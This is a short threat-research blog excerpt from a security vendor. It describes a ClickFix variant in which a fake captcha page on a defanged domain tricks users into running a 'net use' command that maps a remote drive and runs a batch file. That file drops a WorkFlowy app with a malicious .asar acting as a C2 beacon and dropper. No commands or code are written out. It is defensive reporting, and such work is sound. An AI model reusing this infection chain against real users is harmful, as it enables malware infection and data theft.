Disclaimer: This report has been prepared by the Threat Research Center to enhance cybersecurity awareness and support the strengthening of defense capabilities.
It is based on independent research and observations of the current threat landscape available at the time of publication.
The content is intended for informational and preparedness purposes only.
Read more blogs around threat intelligence and adversary research: https://atos.net/en/lp/cybershield
Atos Researchers identified a new variant of the popular ClickFix technique, where attackers convince the user to execute a malicious command on their own device through the Win + R shortcut.
In this variation, a “net use” command is used to map a network drive from an external server, after which a “.cmd” batch file hosted on that drive is executed.
Script downloads a ZIP archive, unpacks it, and executes the legitimate WorkFlowy application with modified, malicious logic hidden inside “.asar” archive.
This acts as a C2 beacon and a dropper for the final malware payload.
In this version, the initial vector of attack is the same as in all the other ones, a web page posing as a captcha mechanism – “happyglamper[.]ro”.